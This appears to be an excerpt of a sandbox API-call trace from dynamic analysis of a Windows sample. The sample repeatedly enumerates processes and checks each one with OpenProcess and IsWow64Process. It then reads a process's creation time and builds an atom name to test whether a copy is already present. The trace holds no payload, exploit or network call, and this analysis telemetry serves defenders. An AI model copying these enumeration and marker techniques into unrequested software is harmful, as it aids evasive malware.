	[0081.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3bc
	[0081.909] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.909] CloseHandle (hObject=0x3bc) returned 1
	[0081.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3bc
	[0081.910] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.910] CloseHandle (hObject=0x3bc) returned 1
	[0081.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3bc
	[0081.910] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.910] CloseHandle (hObject=0x3bc) returned 1
	[0081.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3bc
	[0081.910] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.910] CloseHandle (hObject=0x3bc) returned 1
	[0081.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3bc
	[0081.910] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.910] CloseHandle (hObject=0x3bc) returned 1
	[0081.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3bc
	[0081.910] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.910] CloseHandle (hObject=0x3bc) returned 1
	[0081.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3bc
	[0081.910] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.910] CloseHandle (hObject=0x3bc) returned 1
	[0081.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3bc
	[0081.911] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.911] CloseHandle (hObject=0x3bc) returned 1
	[0081.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3bc
	[0081.911] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.911] CloseHandle (hObject=0x3bc) returned 1
	[0081.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3bc
	[0081.911] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.911] CloseHandle (hObject=0x3bc) returned 1
	[0081.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3bc
	[0081.911] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.911] CloseHandle (hObject=0x3bc) returned 1
	[0081.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3bc
	[0081.911] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.912] CloseHandle (hObject=0x3bc) returned 1
	[0081.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3bc
	[0081.912] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.912] CloseHandle (hObject=0x3bc) returned 1
	[0081.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3bc
	[0081.912] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.912] CloseHandle (hObject=0x3bc) returned 1
	[0081.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3bc
	[0081.912] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.912] CloseHandle (hObject=0x3bc) returned 1
	[0081.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3bc
	[0081.912] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.912] CloseHandle (hObject=0x3bc) returned 1
	[0081.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3bc
	[0081.912] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.912] CloseHandle (hObject=0x3bc) returned 1
	[0081.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3bc
	[0081.913] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.913] CloseHandle (hObject=0x3bc) returned 1
	[0081.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3bc
	[0081.913] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.913] CloseHandle (hObject=0x3bc) returned 1
	[0081.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3bc
	[0081.913] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.913] CloseHandle (hObject=0x3bc) returned 1
	[0081.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3bc
	[0081.913] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.913] CloseHandle (hObject=0x3bc) returned 1
	[0081.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3bc
	[0081.913] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.913] CloseHandle (hObject=0x3bc) returned 1
	[0081.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3bc
	[0081.913] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.913] CloseHandle (hObject=0x3bc) returned 1
	[0081.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3bc
	[0081.914] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.914] CloseHandle (hObject=0x3bc) returned 1
	[0081.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3bc
	[0081.914] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.914] CloseHandle (hObject=0x3bc) returned 1
	[0081.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3bc
	[0081.914] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.914] CloseHandle (hObject=0x3bc) returned 1
	[0081.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3bc
	[0081.914] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.914] CloseHandle (hObject=0x3bc) returned 1
	[0081.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3bc
	[0081.914] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.914] CloseHandle (hObject=0x3bc) returned 1
	[0081.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3bc
	[0081.914] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.914] CloseHandle (hObject=0x3bc) returned 1
	[0081.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3bc
	[0081.915] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.915] CloseHandle (hObject=0x3bc) returned 1
	[0081.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0081.915] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.915] CloseHandle (hObject=0x3bc) returned 1
	[0081.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0081.915] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.915] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.915] GetProcessTimes (in: hProcess=0x3bc, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.916] wsprintfA (in: param_1=0x74e4d8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.916] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.916] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.916] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.916] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.916] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.916] CloseHandle (hObject=0x3bc) returned 1
	[0081.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3bc
	[0081.917] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.917] CloseHandle (hObject=0x3bc) returned 1
	[0081.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3bc
	[0081.958] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.958] CloseHandle (hObject=0x3bc) returned 1
	[0081.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3bc
	[0081.958] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.958] CloseHandle (hObject=0x3bc) returned 1
	[0081.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3bc
	[0081.959] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.959] CloseHandle (hObject=0x3bc) returned 1
	[0081.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3bc
	[0081.959] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.959] CloseHandle (hObject=0x3bc) returned 1
	[0081.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3bc
	[0081.959] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.959] CloseHandle (hObject=0x3bc) returned 1
	[0081.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3bc
	[0081.959] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.959] CloseHandle (hObject=0x3bc) returned 1
	[0081.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3bc
	[0081.959] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.959] CloseHandle (hObject=0x3bc) returned 1
	[0081.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3bc
	[0081.959] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.959] CloseHandle (hObject=0x3bc) returned 1
	[0081.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3bc
	[0081.960] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.960] CloseHandle (hObject=0x3bc) returned 1
	[0081.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3bc
	[0081.960] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.960] CloseHandle (hObject=0x3bc) returned 1
	[0081.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3bc
	[0081.960] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.960] CloseHandle (hObject=0x3bc) returned 1
	[0081.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3bc
	[0081.960] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.960] CloseHandle (hObject=0x3bc) returned 1
	[0081.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3bc
	[0081.960] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.960] CloseHandle (hObject=0x3bc) returned 1
	[0081.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3bc
	[0081.960] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.960] CloseHandle (hObject=0x3bc) returned 1
	[0081.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3bc
	[0081.961] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.961] CloseHandle (hObject=0x3bc) returned 1
	[0081.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3bc
	[0081.961] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.961] CloseHandle (hObject=0x3bc) returned 1
	[0081.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3bc
	[0081.961] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.961] CloseHandle (hObject=0x3bc) returned 1
	[0081.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3bc
	[0081.961] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.961] CloseHandle (hObject=0x3bc) returned 1
	[0081.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3bc
	[0081.961] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.961] CloseHandle (hObject=0x3bc) returned 1
	[0081.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3bc
	[0081.961] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.961] CloseHandle (hObject=0x3bc) returned 1
	[0081.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3bc
	[0081.962] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.962] CloseHandle (hObject=0x3bc) returned 1
	[0081.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3bc
	[0081.962] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.962] CloseHandle (hObject=0x3bc) returned 1
	[0081.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3bc
	[0081.962] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.962] CloseHandle (hObject=0x3bc) returned 1
	[0081.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3bc
	[0081.962] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.962] CloseHandle (hObject=0x3bc) returned 1
	[0081.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3bc
	[0081.962] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.962] CloseHandle (hObject=0x3bc) returned 1
	[0081.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3bc
	[0081.962] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.962] CloseHandle (hObject=0x3bc) returned 1
	[0081.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3bc
	[0081.963] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.963] CloseHandle (hObject=0x3bc) returned 1
	[0081.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3bc
	[0081.963] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.963] CloseHandle (hObject=0x3bc) returned 1
	[0081.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3bc
	[0081.963] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.963] CloseHandle (hObject=0x3bc) returned 1
	[0081.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3bc
	[0081.963] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.963] CloseHandle (hObject=0x3bc) returned 1
	[0081.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0081.963] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.963] CloseHandle (hObject=0x3bc) returned 1
	[0081.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0081.964] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.964] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.964] GetProcessTimes (in: hProcess=0x3bc, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.964] wsprintfA (in: param_1=0x74e4d8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.964] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.964] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.964] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.964] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.965] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.965] CloseHandle (hObject=0x3bc) returned 1
	[0081.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3bc
	[0081.965] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.965] CloseHandle (hObject=0x3bc) returned 1
	[0082.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0082.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0082.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0082.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0082.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0082.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0082.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0082.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0082.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0082.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0082.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0082.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0082.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0082.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0082.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0082.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0082.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0082.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0082.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3bc
	[0082.005] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.005] CloseHandle (hObject=0x3bc) returned 1
	[0082.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0082.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0082.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3bc
	[0082.005] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.005] CloseHandle (hObject=0x3bc) returned 1
	[0082.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0082.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3bc
	[0082.005] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.005] CloseHandle (hObject=0x3bc) returned 1
	[0082.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3bc
	[0082.005] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.005] CloseHandle (hObject=0x3bc) returned 1
	[0082.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3bc
	[0082.006] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.006] CloseHandle (hObject=0x3bc) returned 1
	[0082.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3bc
	[0082.006] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.006] CloseHandle (hObject=0x3bc) returned 1
